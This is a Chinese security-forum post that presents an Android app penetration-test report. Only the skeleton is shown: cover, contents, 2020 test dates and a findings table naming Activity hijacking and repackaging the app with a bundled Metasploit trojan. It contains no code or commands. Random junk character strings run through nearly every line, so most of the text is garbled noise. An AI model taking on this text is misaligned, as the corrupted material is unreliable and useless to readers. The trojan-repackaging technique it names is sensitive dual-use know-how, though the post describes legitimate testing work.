找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4579|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
3 |, I7 }5 Z0 z; d" M+ T6 X( T

% K) i# ?: `' l; d8 U 3 g: H8 v2 z1 n/ ?; t
) {% f4 `. ]& e! m# W( G0 q" F: j( D. }9 V5 B m" V x

. b, |# ?' X& Y6 l4 C 0 A) z4 G' t4 `
2 }5 o. g1 l0 F0 ?! o + Y% w8 [- u F: m/ }" Y# k/ i( M$ M

$ b0 ?& [0 |) K0 d: R , H' d! o5 {$ w 文档编号:                / ?% i' z) V, m; j$ Y' ?. m6 M n6 e% ?! q/ ?* T! C7 c9 Q( u, b

! c f$ Y0 D8 T$ L* M% U) T0 } % T% n% X/ c5 a3 {7 \

6 }3 Y* |1 O! T( G* w, o# M3 ]" x* m% c0 f3 X1 F7 U* C   6 x" S7 I# k/ O$ v" Y* z , g6 n6 p$ ]' F( q- O

q* _6 E, T h' `0 P 3 V, O: L- @% }+ B

: p* U) R& d3 o$ u3 ~1 b9 y% V: ^ M# h) S9 R$ G   8 [7 a/ R) y( ?" ^ 8 X1 W f& C& W" ~- D

! A4 s) t$ _$ H* C2 C 6 `+ E9 K# i5 t

w9 l! d7 u, a' W! ?4 s7 l5 ^: G1 Y2 j# @9 ?3 |2 l# K' Z   & L1 M+ i0 O$ Y# c$ R& J6 d 5 H. N1 z2 U0 Z: O ^6 r

B2 ]4 F; v% |, s) Z/ A) p `4 H! U$ ~# \) q; u

! c: T7 ~$ @( r4 D$ K + L# w5 C2 i4 q$ D N% a3 b* b   6 S% X( C1 W8 U$ R, D+ ^ 3 Z% X, `: J( P9 U

. @4 B& q8 r$ M2 e& l% f6 A( z & x; R# R, t) G& T1 ^2 u

' B) @- Y* J7 V6 r( x 0 o2 [: o+ f! ^* S% f   9 M7 r7 G) d, ]2 X7 n5 o 8 X! Z( o e( V0 o

( f0 l( G3 T7 g" x2 d ( G H9 \1 R1 o# e

4 N& e$ F# X/ a6 u$ x6 q1 _8 p: w, E7 R9 E3 W) k 某某某APP渗透测试 & w( l& M1 R( \4 E8 j - q( A# p5 C& z" u# l

) {6 ~0 }/ N' E4 G' A: Z + {+ h: C f' ~* w0 U2 x, }& w

/ t, b0 `- J, ^0 d) V: z0 W% J( E   $ n: l7 T- j, _$ Z! ~; a; F " p! Y- r% Z: {" E

: ?' h$ l4 j* T- ]7 x7 W9 L ( y; Y3 {1 S x* R

3 X" N$ v7 Z9 X5 ]5 \, ^ ' ?/ p, c9 H1 I+ i   4 k! C* e4 n+ v * `- w" l+ w S, J$ v! W9 l8 ~) [* T

$ Z6 [/ G. O% }2 `; k 4 t( a$ V, y& L% Q; Z- f

/ E# M9 P- S& ~/ J4 T- ~5 P( J5 ^- J5 J1 Z, J3 }0 G4 ~   2 Q9 T2 T! B, ?0 ?! s & G& l, B* E7 B1 k

# [7 j$ _. a8 j Z6 r' d * ~- T' B0 P+ X1 q+ D

4 X; E8 [2 H! ]) S1 X 0 S& W- z) y7 ?3 ^2 _$ i, ^4 q   ( b" l( ^0 t. Z5 B( Y8 \: c 5 c) b" p% ^/ Y8 \7 x9 u' L8 }

$ x" ^7 h8 _2 K, O0 H ) K% A! i. A2 p5 S4 U/ O; j

: S4 O, u0 T; F7 \( s% a$ w- Q; h+ f * N5 Y/ A' G* |7 S- ? 技 术 报 告 ; z8 G2 D% {! D+ @0 ~ $ H8 ?( u" q, W G

$ c" |7 M. B' H7 z6 D A# A( ^) e ! c3 ^( z- A6 T; `7 ]; ]

2 _& }/ n' ~* O( K/ ^+ _ 4 }1 E6 o3 n, ]   ; f' D4 b, F9 j# B, a0 y- z5 J / d2 E# z- k+ R+ M

7 E& J# x1 X! g6 {7 R " R) C+ t" T7 S K( \

; Q! X4 d7 B: [) w1 h# E+ E : I' t5 N" ?& W1 ]   ; @ E3 }3 @6 D, \7 S q- V, l( U: p1 ]% E& y

7 W2 U) W# t' d2 b2 E$ i/ b $ \' `/ |" \, z4 ?

5 `7 }( Q% k; O" }- f/ I- I, o8 e2 I   ( G7 ?1 \' v1 m7 d8 F 7 J' M7 h- ^& [" B% Q' Q

; l$ b8 e. C( |4 H) E8 m3 e 4 e* ^3 V1 {* I

' k4 u+ N2 M! Q, [( { ' y! y' g' i) s, P* O7 |   ; p G$ y) I7 X) B$ r* z. D 7 i# p* ]& F2 P; X6 K9 L

: n1 N' {' O0 z V+ @ ( c+ a" p4 N8 D( v

1 _3 M* M- O0 f& k) ?9 u( W3 u7 j $ O' }4 Z6 ~' B' c0 x* E- E2 V   1 O; u) L, Y$ |, p K , z1 U$ B, I; f

; b& f3 r% q! @2 ` / l4 @3 s! h' e

3 M$ q5 A) c% G5 z9 I ; I" A- ]& A- w4 E3 y; w   4 j0 M: `. l0 o- F; Q4 X+ {. h& T& Y+ Z% K+ l3 ]. p

2 g3 G6 Q1 d3 N6 D5 @/ {0 \$ q9 f: u7 t9 G- ^$ y

) A" Y9 q6 z+ s8 L- i3 k9 U( l$ ?2 S   : D3 @% T! `4 @ q3 I : Y2 e: |! g1 V: d, T9 A

0 ?5 P' E% Z B; Q, q1 E # a( g7 ^* a4 \) p7 ]

$ L" C+ Z- v) o* ]1 ?4 y $ P$ W% F4 j, I2 u( q   * p/ U. W3 H' S5 i ; }$ T6 p/ [: @

8 C- W: R6 @$ | S1 x, w! Q+ b! R" a6 ]8 x% J5 B: E5 D0 d

$ U" i# d. ~ V! O6 R/ D8 d& P4 q+ J! r+ T0 h* L   - [. x& L6 C; l* J3 c1 x3 X v4 z ! @2 y4 R1 C; R4 S2 g. I) D5 J3 r

6 F2 d( N; |( z+ b/ u 8 O+ H# T! O0 H7 l$ y

5 n7 N/ G% ]4 Q, D , y: y' F# G8 r   . c Y0 p' a B, Z) K4 F) M# t - g' b4 S- D2 D6 r! `5 O; z

; z7 D6 ?+ X2 ]5 }. h( |2 t4 }& \8 S7 R- Y4 _# h% P$ U+ ] K+ M

, ~* U7 G7 _' ~8 T- ~9 X 6 x; i) d5 u- O   ) F. z$ x1 q0 Y. g4 v6 ` Q+ u 5 c" a* _# y. b- {2 q' M

* P$ M# }/ b. {* G3 b0 t 2 v2 x0 N4 t0 S s

5 R: h* _; C- j% b1 r) u9 n 0 Q8 k' n7 d% Y- F   7 K! I6 b! o6 O( O9 ?' X* j 8 c) T. M% b4 `" m; V9 Q/ g

; R: j& ?7 a, s' z& k' h; X0 w0 \; R8 k; f7 a6 o$ Y

4 P5 V# z1 p; [ w9 m1 T . _ p6 K; W" x0 \% N. h" ]1 o   . J% Q+ |) f9 N2 U# A" L & H# r% N' z9 H; @" _9 k! F7 e

) v# H+ J) E& ? " g; u' S( ^- L, R2 N+ C

1 M [$ f! Q2 L" E( k3 O. ] : ^1 N8 ^3 c" |( z   , Q* C- f' D' D8 ? / y% ? \7 z5 X2 ` Q7 V0 X" e

3 Q6 E8 Z/ N3 p7 r/ _/ h& M * W4 e, P8 n! ]3 Q h+ z

# j. |" f6 u4 F1 ` - O# K8 Y; ?1 @   7 l- t5 R, ~( Y [3 `7 U & P1 Z2 g! T5 [4 j

5 R; q) a" f' r: X* ?" D: ^ 6 O4 e2 d( R1 b6 j- Z! K9 k

3 D/ _/ [1 B9 G- X( }2 x' B ; {4 }5 s! o+ a6 s$ _   " z- [: x, a: r" ^. v, ^" w- w8 O( q( l2 u. S; t; k6 f; L

- w1 O1 l' |4 `3 o' D 5 X, C7 p( B! K" H2 r# M

$ v0 x2 r2 W4 W5 W8 d" Y5 ~5 {" [6 K9 ~/ A; V- ~0 G   . B! q6 Y4 U' ^/ Q' e2 ]: _- Q 6 T2 U A# j J

- t, ~ g. {, y+ m. g G+ ?2 }3 d* S7 j: N- u

! n& w( w: ]6 d2 H- G0 Z: B* P" E, K. R7 U# m! E1 B. [   * {8 w) |, c7 i4 P+ ?+ W # b+ w$ @4 P: E* J

2 i: s7 r# r3 t 4 b: T3 v& n* v# x/ ]

: k/ j& B6 w( X$ C: l * D4 x2 K$ t$ w/ i4 |) \' u 二〇二〇年 m( H+ J, u5 x9 k" x; s! a% W f- W& _/ a* R* i

) m8 Q. \9 `; F4 ~* t 7 i# l$ ]2 t. f! y/ H1 b
4 J; x3 b, G: U- A! y0 J 6 w) X4 w) N3 U
* J* I% E3 \' f( j# j. n # y7 q, b: Y/ Z! I0 h& \! j6 V) x8 V, u 0 u" p- t! T# x" y3 r 3 K4 x# u0 j) b+ _5 o
$ B; D1 }: x5 C" I0 { ; n, n, [2 O7 u* o# I
8 z6 f6 ?# L' H9 G! f; E' ]' t 3 _- P0 V% a7 @' T. }
/ z, m9 E$ n, X) ~* q0 }+ q9 M4 s$ n/ r 3 {. Z( b4 F- N4 @ + Y; l y! Z) [, s1 s+ h2 [ y8 M
7 V9 N' s1 F" D 3 G: g, w' h" A6 z- w0 G

8 l/ x9 s0 k4 b' Z) @, S * J# A+ [' z8 j; @0 j$ w8 W% H 目 录 ( T; ~% [ V, f$ ~) X$ y" z3 e 8 e: z' F' t, @3 M2 I3 E1 j

7 L9 `: d; ~ e6 a' O/ P) q, F - s8 L& [8 a7 X* J1 ?2 o " v3 B" w {3 v( w6 ^ 4 [! j/ z7 D4 V( u6 X2 ~

, g9 ^2 g2 e/ k! z( ~ : l4 t9 X9 G) N+ l5 `& |   $ b$ N% j1 P" _1 m) ^ 7 B/ b4 z; _8 j7 [( `+ `: S* O

% D' g/ a) B: E: _( j 0 H' ^, _% ^' S

9 O. ?* a: K/ }0 F9 H1 R3 c2 ^: Q3 A( U- l) A d# \# [ 1 概述... 3 ' R# V" p/ K* j \ * @; ~$ `8 y4 n$ N" `. ]

- |+ }' S& {) _7 { j( e ! `' |5 ?$ h8 ^

, _( |4 B& I7 Q4 J4 l, v. [- A7 d 5 V+ W& p9 Y, L2 @ 1.2测试时间... 3 $ ?6 B c9 `( B& V8 k0 E/ H 1 Z, _, E! ~8 A! @' ~6 H

6 J7 \5 x3 Q- X+ D B ; K3 y* U, D, T, U& l% Z$ N

0 V$ ~4 b% p/ Z N2 A3 q: U, ~8 G* d6 t- E8 @( S& S5 ?6 p 1.3测试对象... 3 / z5 G o! p3 H3 [2 @6 f2 k 0 D; L3 @; I6 Y* b) s; b; l

, E- h# F, U0 I' z' x2 w1 Z8 Q# C1 S- P& p' H& p& z8 ]

W( m, f: r& y2 f& j ) _. {: {( k$ L2 c5 O' g# J 1.4测试结果... 3 : x5 U& y& e9 ^( t+ L- P 9 j6 P; L0 s4 j( g6 a4 v

6 r7 i# Q6 s& A! X 4 s P% ~8 U! X" d) i/ z9 q. ]2 h

" {9 N* _8 S( O ]/ M1 |) D6 I6 @5 ~0 o F- S 2 检测结果... 4 : A2 N. Z+ {: B3 t 8 u( c7 |; a B* v1 L1 k4 o

& {6 l, J7 ?8 s9 m % D7 q- ?/ j. |/ S5 d9 p4 V

7 Y: g4 G! I% {1 T) K" N$ ~ + N2 d, y& W0 |2 C" {5 L 2.1 某某某... 4 7 y U; C* G* t, ]% f3 j; e8 O8 b: L/ l% L3 K. d

3 ~* W* f# f8 X9 y5 e+ d& W E % |% y! e4 }0 Q& P0 t

/ J4 b+ O" Z; t, u: T) w1 r& E ) M* @+ \" ]4 j) `- Q z+ c 2.1.1检测目标... 4 ) Q5 ~2 ?5 G# x, u' U7 K: [ & a2 H/ A8 _& t8 \ A

9 {4 [3 ]! Q$ s- Y $ o! p0 n/ p* D3 A. u

$ h; O+ h, a6 Y# y- p" ^: T- |' z7 x $ [8 [1 v9 g L 2.1.2检测结果... 4 : P0 v6 e. e; I# K3 y+ _ p t R" K: u' Z9 w

' \& V, v1 u' V0 n& A$ ?2 a4 F$ V/ B5 \7 ~7 w' P5 ^" S# D6 u

9 p- l1 e- r5 b X) t8 c) [, @, X 2 N: m8 ~4 N8 E4 J 2.1.2.1. 4 " k- R# _0 K2 ? $ l1 X: c s* t( s) i( u

/ @( y2 ?) F$ W% ~# y" ^, o + [+ \+ {) ~/ H3 e) k9 n; d0 {

/ u% u8 c$ J9 Q5 @' z3 _: `% l, p# y8 @' E+ N* }% |: q 2.1.2.2. 6 1 j* d9 g; z/ @' U7 k- Q7 H ( N* j2 g+ }1 v- l) I% S

9 K2 y3 M0 s/ f8 V/ [+ n& W3 M8 _; a5 p

( K% ?0 L+ }+ S+ B) l' Z$ u5 e, J8 |0 f7 ^ ! F# i# R) \- P* g # h$ l, z1 h9 L- ^" q& v

! O( V: ]3 B3 c0 i; L4 A % u% X! X9 I1 L1 @) {# l ! Q$ Z/ T$ s5 d0 v$ S. q+ n8 w . l' x! U" J0 `8 H) T, M2 G, I
: B1 I; g, o0 V+ D$ e& g$ x. s3 g/ f 9 y8 n& T% |' L+ ^5 l( g0 c3 B% q* @
( O8 p; |' W ~, O+ _, F + t2 z# `9 y& L. z7 l! a0 T, m 9 o, S& h+ F A8 l 0 f5 P% {& k. H6 I% e3 x: a* i

5 c B0 x! b& v* Z" p6 s T g# F; J0 X+ c/ B5 {( E( o. o 1 概述 ' x# t$ z+ Y* I" r0 u0 b) Y 1 ~$ \" o/ g, O& e# t5 C4 R

5 q5 C* a; j8 G/ j) V- r, V " V: e9 |: T) {4 ?3 A( a- r+ i

* |6 o$ t4 g! [# R3 Y( c 4 W/ I5 \- A S0 g0 A! c% P" b 1.2测试时间 : Q+ B8 I- d8 u ) ]* a; l, h6 g* ?" v2 x

! z7 b; X$ z+ {3 C* r" J- ]0 F$ l& i+ \5 H; b1 M* `/ k 3 J) w2 o/ W/ R( i$ m* n% q% d. y$ T A* ~6 w( o l7 V; B1 }* R5 {* l5 e- c1 t$ i6 ^! v# n. V6 z1 F% T! o2 ^+ Z$ B( X: i6 |5 A; ?4 }) \1 w; O$ R/ v5 [& ?7 j' Z8 ?* v3 G# F3 O/ M. R* O0 f" f4 p, K, d2 T. z" y$ \4 l) _# Z5 V/ h! m' B: |0 Q% K L/ j& S; a! N2 _$ j1 D: K# j4 M: s) ^* v5 d* K w, m- E1 l; p/ t! {) M6 t8 t! q1 `0 s; n: B: P1 R0 W K- ^4 Q, b* f5 I* s( @7 |- g1 f! ]6 Y6 W2 j' u& P: `* s2 K6 M8 q5 g8 v, d: i X* _; G" O6 s& e6 F* U/ {* L/ Z; P" w# V$ F$ b) R% }, k2 \* l1 N/ N3 M. F% P! Q: l1 V6 i. r _0 H2 K# I* a; F% K( [2 V% @# v+ B* m) f! z. m7 ?7 P& q0 o! f, u8 a( `% x! s% @: }% v, D% ]+ G% ^+ G+ _# t8 y" }$ B) Z. c! R) H+ u [% w, X; z* |. i, }3 c
, T% L9 y& o) y( V* G1 P: v% w# d( L/ j& D9 k; @

: _; U' i' H' C+ |. A+ l0 F; V- O 4 V x9 Y$ f/ `2 d 渗透测试时间 9 e6 w9 X9 E5 Z! S ' O2 ^9 n' a% ]7 B+ c/ [. f# l

: N; I; } V* M( s2 F; d * d+ |" p* E# `. |' o4 {
+ _- I% L0 h* {1 E" ? ) [3 |+ n5 ]1 z7 ~- x+ [

/ D+ o$ @# B0 [) c7 x: d; r + [5 S1 }( v# Q1 |5 ?2 F5 _6 x 起始时间 / S& ` k; t7 k' ]" { 4 o6 V. e8 p, X1 R1 ]

( K( z2 t$ [6 w D* w* {- J! u# u0 p 		2 ], Z- d* x6 a5 Y ) |; N0 [* Q& n* d

" {* @" p/ Y! i" j; N, G3 ~9 ^ 6 z7 S4 z D v 202046 , q& p+ s' k7 }7 Y g# h3 _# Y! t" Z% S

. f4 m; Y4 V: k2 A- s/ ~, s8 x9 Y3 |! }+ ~9 T" S2 c" k
8 _' t" y7 c% l3 @7 {5 }3 `6 D # R: y2 u) Z" F: J

9 f% C. b# x$ ]/ L2 T: S0 c+ T l, j 结束时间 ! p0 {- C; M# C/ n 6 Y& [5 B, a; ^0 L+ t

. p2 Z; D6 ?6 @3 ^ / u) q2 k, H3 E& L) q D 		' o' N9 r) H% j& i 4 R5 Q! A% g9 ?. q

: k1 I& q7 B0 m1 {& P) }# t: z" Z3 x 5 [5 @6 Q+ Q7 _7 C- C9 d" r( J- K 202049 & P/ ?. ?+ U: B: L( g ' Q* o: a/ X9 d+ u2 z

) A# K$ S( _7 L9 E" e R3 x5 r% ]: L* J9 v
9 r1 i/ ^6 ~5 z. F6 z ) Z. e( F* Y$ `

$ [9 Y% x' z6 k7 u" d k # U! t0 e- J! m 1.3测试对象 " a8 ] l. k" W7 o6 a8 Y8 j2 ` , g4 `; v! u9 e8 F6 |

$ K8 Q/ h+ c0 d0 z% w1 } * P# ]; E% Q& u, A3 v6 c

& {: O- L9 y- s/ Y, k: A( E2 E) n' Y3 l! y 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 2 \3 P2 Z1 W2 ?' Q* r& O7 S2 a; w) j5 F2 I

% y9 h, A3 V# g ; v! o4 l8 P% \- h q, U3 J' T

/ a- o. K6 e$ u% M) c8 b$ f , q2 @5 g. v# P! K8 S- n* _) G 1-1 检测对象 7 {0 y, Y% p5 o h4 ?3 `2 x- Q- ]; N" `6 n

, _( I, \; F/ j. F- y, m$ ?( I $ |' D* n2 W# T, T ' u* k9 z5 q$ d& `( S6 Y' @- d% d; l% x) ?" ~, @' O2 X; h8 r" U! T' _" c1 W# j! p. y! F4 P* [/ n9 v9 m: K2 T/ ~( [) s0 }! U; T+ J% a. U) a9 y& b- U! w0 f3 D9 P* w( c- ^3 u7 W) h* V- d d, P& w* j# O! y1 w! w% J+ c5 F: o- p/ a. }3 I8 U5 f: B' y; u, x. ~5 L' B- M. Z Y% }; o3 c' R8 P) }$ d( \# j2 X& F( X+ I5 R/ e' Y x" J& D8 W+ n0 `# v2 J, L; _6 o E u. c! \' |; ~: @# I* Z/ n! R, o' d4 {" e5 V! D2 K& l0 B1 d( L5 q' o' [7 [( o" c: W9 i! s; K) z" u l1 E' ?. F. t8 o- e h! W7 h$ u( M# J, C! S$ j b. @* l0 P$ r- D' M- m$ g; I$ t: s& Y" C0 t# m# C ]1 ^4 x1 p) i1 c; ~8 _9 D' `. r5 d& Z4 T0 K U& q V* |2 ]1 Y: F0 m8 v/ {: U4 b5 ?8 B( W& J" ^. M6 y+ _' h( `0 Y6 t* i: N2 z
5 d/ x, {& s% i* d/ z$ C 0 e; `3 {! A% |. ?* {9 w/ a: W/ G

/ q( f6 T0 K8 n1 Z+ _ b) y, O+ A6 q4 \ 序号 ( f* @6 s1 K# a! f. n4 B- C* d8 d+ \' R3 N; U

% N) t6 Z+ |% }# y, [# e6 P: B' K$ J2 f3 P 		. F% n9 a" B. N! Y 6 J0 T% k+ H4 k" P H

* D6 E! N% @/ W3 j" z# x! s* K& v7 p 6 }3 v' v$ B$ _2 E) o8 F6 _; J9 n 测试对象 2 {8 B% W" o8 x( M ' h' z! {# I [7 A

1 z' j" \, f; z9 c0 V( H! l$ T0 [+ x8 l% A" f, Y( N4 O 		' h8 H, K' j6 u; E! M5 s U# p 2 Y2 p5 [ y9 v4 }+ n- y

; n0 W. r4 e/ r8 U" d9 ^7 l6 c7 V8 F( _ 测试地址 1 f& K; g+ m5 n) h4 b, N( q1 E + ?4 k K& x, z0 v

9 ?- Q+ C+ B4 j' z* w( D0 n3 S $ H$ g) v/ v1 c' y! l& U0 ~ 		/ T/ ?+ T& N j& t3 K ; S2 G# J. Z7 A( F% d: _8 L: }

. `+ d( `) Z1 H! E: a& h * E% Z; B8 j2 i& I. M& } 安全漏洞 $ e+ a& z" J+ V- f & ]+ g* N4 T8 E9 Q2 F

. a; Z& y, r+ A& M5 L' r6 G" |0 `/ h+ C u1 R
& ^, A5 w/ z2 }$ Z" J & b+ P% N2 d% V' \7 Z' D$ k2 b6 p

; |$ X$ O( k' D3 {! c! q 2 ?7 y5 l9 t p% f$ P( w0 b' y 1 ! V5 A" W& U2 z' Y6 x1 A v/ f z" }& l E/ X; Y+ \% m+ u

5 g) [; c. i0 K" P 4 ~+ |# e2 K% }6 ^9 ?$ h6 M9 ~ 		2 V% s8 F/ Q. `( N- ] + f$ P7 e4 P. \

" u" r5 c" {* A: ~ F, R% l 3 d% H$ ?: K/ _) I' M- Z 某某某安卓APP 3 e8 a1 h6 I- U/ r' n3 p" ~; E; k+ v3 a

% }( _8 T0 K# h5 z4 Q$ M9 } 5 F4 e) {! a7 S( Z# j8 B Z 		' b0 @0 ?- j$ K3 _( O 4 S5 u. f9 T" ?+ B( b1 ~; `

8 F# r$ ?* C8 F" Q8 X ! L! G: W; G; @$ J1 g6 D- I   ) ]+ l) I+ E# R: r; {' f & @ r" H, {" c2 Z$ g7 x& ?0 D

2 E5 ]3 Y" l; [: j& n4 M7 F- k4 q1 a) y' y- U% V8 W$ O+ B; f 		! j" Z# u6 X* s0 `& t, ]3 S, C) T' o

7 q5 R0 |0 o$ o8 q" D8 v) C ! v% M! }/ p* H; o 2 1 }$ [, @ z% w- ]9 E: _ 5 I3 ~" J% j% K0 B

/ D: k' t9 z; t8 y( ^% Y' b ( f" i8 C) P3 [1 J3 f
* p) g& ?) E [$ g- f; |5 E* u5 k7 U 9 a; E& b$ l( i1 H

9 R6 n8 L! ]) r+ x( T ' w2 {, f, h9 J# |8 X4 R: q3 K 1.4测试结果 , G1 I, @* Y) y! ` 7 k+ r8 |6 j2 w& j) A# ^2 v# V2 r$ C

. J. d+ d2 V6 p9 M( e: T! U3 G+ i$ ~$ r4 h2 H# r# {

" `, e. U; N) T/ [0 u / ? z8 I& p' {9 m- A 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ' _* i* P& w) z5 c6 E8 I2 y2 b% Z. W! d; |2 R/ b

) O' W9 R# P0 F; U" m4 i ; s/ ]: N& `3 D2 {& k

8 a4 Q& I# U! C/ T3 i; I5 r 8 p- Q$ ]$ S! T5 ]' d+ R   ; i' \0 d+ ^2 P8 N/ s9 n 5 k ^* Y7 s5 s0 A$ Z5 p1 N

?1 f# d3 O8 Z! U. y' z9 U ( I% i4 N. T/ h3 s; X
+ \: ?! Y8 U' _2 o $ D% P+ Y! X5 z4 x% H5 Q. b) l 6 c, f( E* e' L3 @! [7 t, r5 M9 h5 `8 [) n3 P5 Z6 e v( q* B+ z8 _4 p m* V2 O3 u. m8 o' D0 b: Z6 Q! T2 H/ X! ?& x* E i: F; m9 A' ]5 i# t' H1 E! O# r' l y( j5 A7 Y: j# X% @! L8 {: h. J8 H, u' r6 ]6 t, {9 P) n8 y2 n9 Y- `/ m1 c- }6 j3 Q2 A" r, I0 o N4 D: U8 O. G/ d- Q V' P+ X5 n! l8 [8 E" Q. i! T8 S/ H T, ? U6 e. q' z4 T% k) j- F1 k5 T' l+ ]% p' \ B/ y8 w$ l/ w& `5 d! t1 m. \# M& N9 L! r# y9 b: z* ?6 u( B+ C. F" D. v) V3 e$ m& r# z6 D8 Z; A9 l8 l$ b+ q" M. y I& N( W4 m# I; e) T2 V- \5 M, R/ a1 U" {2 a9 l. J: U, y2 T- t9 C+ M3 }: R! }- j, d( Y* B# Q' C o3 ?% w+ G% g7 ?( R! a2 X+ t/ I" p- k% Z6 r5 V. Q' `/ J& `7 V+ ~+ c' G2 ?% k$ a& Y' ?( q/ n# g2 Q, g; m' c/ r% L9 E! j5 i- ^3 I: d* r7 Z' ^6 g( z9 Y, C# N$ S) U' G+ ? ]2 H6 ~9 i4 W! ^# |. V0 |9 }& N8 q0 f1 a8 `! i' y6 n- G) L; M8 `* M: C: X8 [8 U3 x- W, k {% a, c/ R7 }; S" Z4 B( {) v1 k4 `, C n" R8 M! r2 T1 W' H; c, P& [0 X0 [* E4 S, o0 p$ n5 R/ ?: h: |$ z% P7 u3 ]% z) S( k* M' h, v2 P4 B3 @8 u7 S" F* |+ k, l, ?) e6 | f& E2 r* L) G1 l+ l7 t5 N1 x& R1 p8 y% M) k D# V" v4 t) }; \7 h. J% L+ i. t6 B
: j/ T5 b3 i4 q" x: F 4 H6 B; r5 f# j- f/ l1 u

/ m* A: p7 a9 t) z/ ^% \ $ n8 ^* m Z' M' x 序号 & v0 U" ?8 v8 Y+ c+ O 5 y6 z9 n l- w# y

1 {1 m7 @' f H" p0 |; J, ]- |/ U. n2 d& [. t4 @ 		+ o8 u# s% [5 K4 f7 ~1 P! s, d: f 2 ~. N, i; D \

* c) m6 ?* P- g* m% J; y + H9 U/ r8 m8 K& \( F 系统名称 : r$ h. R+ s- c" {% t. [" {) b; v : j; \- Y/ o3 H1 ^( j! k

! j& K% g( r9 I- l- P' R$ E1 e0 E , a' ~/ y* l. D 		- d! C2 a( n5 P) N6 g4 o" l( C: F# T2 a$ C" r( K- a3 S* J

+ R8 |3 }: q4 `+ L. n " G Q; x2 P( e' F4 P' a 漏洞名称 # i% D' k$ n) o9 _ , c% Y! U1 \) I1 C- Z

0 k& o4 M6 e1 H/ D E) c! h) H4 d5 O $ c+ e6 u7 `) I 		# f/ R+ T& U( h/ W k2 x . s. V9 _" Z* G. A5 _" E

' w' B Y" B* N, m* E . X. M1 ]) n3 E2 ]$ w. M 漏洞危害 # n, ^! Z5 @" B; Z; G5 l2 O/ r $ ~$ Y! E X) D7 ]& d# {! a

8 |- f6 \' Y9 v m. ]1 j+ `- _% t' | 		* R0 r$ h( z' T: V: K ! n" m- @0 d2 S1 X

" _$ e8 C% Y: P2 U' s " `5 D7 D4 }9 D) C) ] 修复结果 * {+ R. B1 l' X ' M& B+ Z! k. C2 j/ z* v! o

& i4 ?5 [" z0 A% f" R m9 v" r* |9 C2 K( |" i
2 T; Y8 b( M# b" e# {; } $ e% n7 s2 k- V/ l' Y y0 t/ B H

) N, G y8 v- i2 K( X 2 l h& t# o/ ?* m$ l 1 6 B- P. S" d( H+ i( R 7 y: b0 n1 I I0 E- B4 b, B

3 r/ N2 B4 Y9 D/ I( M) L. u : D) B9 j# ^1 A$ A! y 		) @3 i- w* K5 k8 B# y7 `9 h b, h+ K7 o) ?

$ a5 Q( T3 v6 ~ 8 m; I( U7 y( {; a9 }. X 某某某某某某APP 9 r$ g* P* s6 q% k0 D, o- A( S& c $ b4 ]( p" G+ l8 Y

5 t0 \- k8 p6 i5 {, P- C , N4 q2 _. `8 e$ j' [, K4 {9 H- v( } 		$ |. b2 Q9 y3 g: r6 G6 q. q0 n ( U( O2 h) y5 y; N

% a G3 u5 l* n' [ . ~7 u) v& F5 H" Y& Z( Q7 ] Activity 劫持 ' \+ U( l" f8 d, |4 n- t$ @2 {, L ' j. P2 S3 G3 I( s$ C% _

3 V9 z; K9 R& _- u# O 7 f6 t, d& |3 O) K

$ `& x$ _5 _" G M3 a 4 g2 g% p+ N* f; ?) f# q3 [! d   % E+ h& D- X, V o, o+ u 7 G1 \" z# [# B |* i, [

C: M2 T: u2 v- m* }4 ` 3 h$ h. v- Y& y 		6 h. O$ }& [' T. X ; d5 k1 |+ t& H) `2 j

& ^) }& X. O1 J0 ?) S. @5 O, ] $ M2 M/ \* }/ d. p+ k' o6 M 1 T3 b- v7 T. D& m! i; N" S# t5 | * E* o7 W- ?2 c! B* e' I

! N6 I1 u% B- d1 Z/ W+ z z ) Y0 t, U# \) h- x0 Q# [2 {, b3 e 		+ ?. {4 R# R0 y6 m$ _) ~- i2 a$ K6 F( q( f# U1 I. ^% e

0 w2 g z8 y: a: \" x' Q - d0 d5 |$ R; _0 ~0 Z& j* X   6 N5 g/ K' K$ ~+ \ 4 ^' T. k! @. I* B/ O! p7 `

8 b) u+ x4 }3 f' F6 V6 | 2 D- o. R; K: g# Z @
8 L7 Q- J7 p9 ^! \( u' [2 r7 Y: f5 `6 P

: U1 ] H* ^/ W9 O1 j3 [+ _' Z8 h0 n 0 a! S/ J2 r0 B# W 2 ) a w- `: u T3 w+ z1 X' i6 {, b9 R$ M

; ~! b! W/ u1 B3 M# V9 [# ? 1 Q2 k. o) d! l& L% p 		% I& A; y. y C `/ L" C 3 c0 ^) p: R7 @. a! w' Z: @

' ~! {3 q8 n* K* h6 x+ x$ E4 R3 H# d8 E$ d 某某某某某某APP / J6 M1 w( a' y7 w& a / o# B7 B/ X! L! q: E5 ]- s0 e

2 C- U% U- c8 p5 h 8 T( z" o) J! }. ]) x8 X$ F6 E 		9 ?" y4 y; v& u& _% d. H0 n+ ` 6 e9 D! f# x* n- \9 o+ b4 Q" t: g

% U$ `! h v; T( j) ^ % Y7 O' u9 {& v# J 反编译二次打包捆绑木马、篡改APP代码 * D8 x* Q* ?$ @6 n: g7 Q9 Y4 e: t# x, c; D. `' {8 b

+ @, Y& _9 h% F) u. N1 P5 U. e q2 ^, S3 x 		0 j: a# o) U: }. i3 n # R" q6 \" p8 N- n) f# R" A

5 ^5 x2 l. I0 e9 l- h+ M3 K$ h. v0 M) j% F6 c0 W! M: h1 L 7 I: e* U7 j+ l) t- L3 I/ m. f3 J; V# Y5 Q# h0 L" i3 H. z% |

0 w; n- f( a% Y8 O$ Z ! _0 F: q& |8 l0 `" f7 _5 | 		: N. ` u2 N" _; e3 \" y 3 ]& ]; ^/ u- \) ~

* J6 p' T; V; M7 t* b1 B# V 6 K" z" f/ Z* ^) [- T3 j   . t5 J) G4 U. Z9 j & N0 c0 m3 h* f5 o" C2 M/ ^

3 }0 C$ m2 ~5 [" \ ; O8 ?! E$ u+ @# x% F3 v8 [
, Q0 ~# o1 g1 s& o% \ % j# f: A3 ~7 }8 L
